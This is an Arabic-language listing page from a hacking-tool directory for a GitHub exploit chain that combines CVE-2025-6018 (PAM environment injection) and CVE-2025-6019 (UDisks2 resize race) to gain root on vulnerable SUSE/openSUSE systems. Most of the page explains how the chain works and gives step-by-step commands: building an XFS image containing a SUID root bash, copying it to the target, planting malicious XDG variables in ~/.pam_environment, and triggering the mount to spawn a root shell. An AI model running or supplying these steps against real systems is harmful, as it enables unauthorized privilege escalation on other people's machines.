Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Exploit-Chain-CVE-2025-6018-6019 — سلسلة استغلال من CVE-2025-6018 إلى CVE-2025-6019 | Kitploit
أدوات/GitHubGitHub/0rioncollector/exploit-chain-cve-2025-6018-6019
تصعيد الامتيازاتأطر الاستغلالتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالفريق الأحمر
GitHub0rioncollector/exploit-chain-cve-2025-6018-6019

Exploit-Chain-CVE-2025-6018-6019

سلسلة استغلال من CVE-2025-6018 إلى CVE-2025-6019

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
449منذ 7 أشهرلم تتم المراجعة بعد

https://cdn2.qualys.com/2025/06/17/suse15-pam-udisks-lpe.txt

يستغل هذا الثغرات CVE-2025-6018 و CVE-2025-6019 لتحقيق تصعيد الصلاحيات محلياً من مستخدم غير مميز إلى الجذر على أنظمة SUSE/openSUSE الضعيفة. CVE-2025-6018 هي ثغرة حقن متغيرات البيئة في PAM (وحدات المصادقة القابلة للتوصيل) في pam_env.so (الإصدارات 1.3.0-1.6.0) تسمح للمستخدمين بتسميم بيئة الجلسة الخاصة بهم عبر ~/.pam_environment باستخدام توجيه OVERRIDE. من خلال التلاعب بمتغيرات جلسة XDG (XDG_SEAT, XDG_VTNR, XDG_SESSION_TYPE)، يمكن للمهاجم خداع systemd-logind لمنح صلاحيات allow_active من PolicyKit، مما يجعل جلسة SSH البعيدة تظهر وكأنها جلسة محلية فعلية. بمجرد الحصول على حالة allow_active، يمكن استغلال CVE-2025-6019: تسمح هذه الثغرة في UDisks2/libblockdev للمستخدمين الذين لديهم أذونات allow_active بتثبيت أنظمة الملفات بخيارات مميزة (exec, suid) من خلال حالة سباق في طريقة D-Bus Filesystem.Resize. عندما يتم تشغيل عملية تغيير الحجم على جهاز حلقة loop يحتوي على نظام ملفات XFS معدّل مع ثنائي bash SUID الجذر، يقوم libblockdev تلقائياً بتثبيت نظام الملفات لإجراء تغيير الحجم، لكنه يفشل في فك التثبيت بسبب خطأ تغيير الحجم، مما يترك bash SUID متاحاً في /tmp/blockdev*/، ويمكن تنفيذه بعد ذلك للحصول على شل جذر.

الخطوات التفصيلية

المرحلة 1: إنشاء صورة XFS (المهاجم/Kali)

root@kitploit:~
sudo ./ExploitChain.sh stage1 [output_path]
# Default: ./xfs.image
# Creates 300MB XFS filesystem with SUID root bash

نقل الصورة إلى الهدف

root@kitploit:~
scp xfs.image user@<target_ip>:/tmp/

المرحلة 2: حقن PAM (الهدف)

root@kitploit:~
./ExploitChain.sh stage2
# Creates ~/.pam_environment with malicious XDG variables
# MUST logout and login to trigger PAM processing

تسجيل الخروج وإعادة المصادقة

root@kitploit:~
logout
ssh user@<target_ip>
# PAM processes ~/.pam_environment on login
# systemd-logind grants allow_active status

المرحلة 3: استغلال UDisks2 (الهدف)

root@kitploit:~
./ExploitChain.sh stage3 /tmp/xfs.image
# Exploits UDisks2 Filesystem.Resize bug
# Mounts XFS image with SUID bash
# Spawns root shell

الوضع التلقائي

root@kitploit:~
# On Kali (auto-detects root and runs stage1)
sudo ./Exploit-6018-Chain-6019-v3.sh auto

# On target (auto-detects stage and runs stage2/stage3)
./ExploitChain.sh auto /tmp/xfs.image

المساعدة

root@kitploit:~
./ExploitChain.sh help
تنزيل الأداة